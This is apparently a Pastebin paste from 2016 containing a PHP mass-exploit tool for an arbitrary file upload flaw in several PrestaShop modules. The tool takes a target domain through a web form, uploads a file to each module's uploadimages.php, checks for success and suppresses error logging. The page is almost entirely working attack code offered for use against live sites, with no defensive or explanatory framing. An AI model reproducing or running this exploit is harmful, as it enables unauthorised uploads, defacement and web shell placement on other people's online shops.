Advertisement
AZZATSSINS_CYBERSERK

Prestashop Arbitary File Upload

Sep 8th, 2016
282
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.71 KB | None | 0 0
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @ini_set('error_log',NULL);
  5. @ini_set('log_errors',0);
  6. @ini_set('display_errors', 0);
  7. @set_time_limit(0);
  8. /*
  9. Name app : Prestashop Arbitary File Upload
  10. Author / Editor Script : AZZATSSINS CYBERSERKERS
  11. */
  12. echo"<title>Prestashop Arbitary File Upload</title><center>
  13. <body bgcolor=silver><u><i><b><h1>&copy; AZZATSSINS CYBERSERKERS</h1>
  14. </b></i></u><br>
  15.     <form method='post'>
  16.     Domain: <br>
  17.     <textarea placeholder='http://www.target.com/' name='url' style='width: 500px; height: 20px;'></textarea><br>
  18.     <input type='submit' name='azzatssins' value='Fuck it!'>
  19.     </form><br>";
  20.     if($_POST['azzatssins']) {
  21. $site = $_POST['url'];
  22. $file = "ac.html";
  23. echo "<br><u><b>Target : ".$site."</b></u><br>";
  24. $expl = array("/modules/simpleslideshow/","/modules/productpageadverts/","/modules/homepageadvertise/","/modules/columnadverts/","/modules/vtemslideshow/");
  25. foreach($expl as $exploit){
  26. $post = array("userfile" => "@$file",
  27. );
  28. $azzatssins = $site.$exploit."/uploadimages.php";
  29. $ch2 = curl_init ($azzatssins);
  30. curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
  31. curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
  32. curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
  33. curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
  34. curl_setopt ($ch2, CURLOPT_POST, 1);
  35. curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
  36. $data = curl_exec ($ch2);
  37. $cyberserkers = $site.$exploit."/file_uploads/".$file;
  38. $azzatssinscyberserkers = @file_get_contents($cyberserkers);
  39.             if(preg_match('#AZZATSSINS#i',$azzatssinscyberserkers)){
  40.             echo "<br> [#]Exploit Success :) <br>[#] ".$cyberserkers."<br><hr><br>";
  41.             }else{
  42.                 echo "<br>";}
  43. } }
  44. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement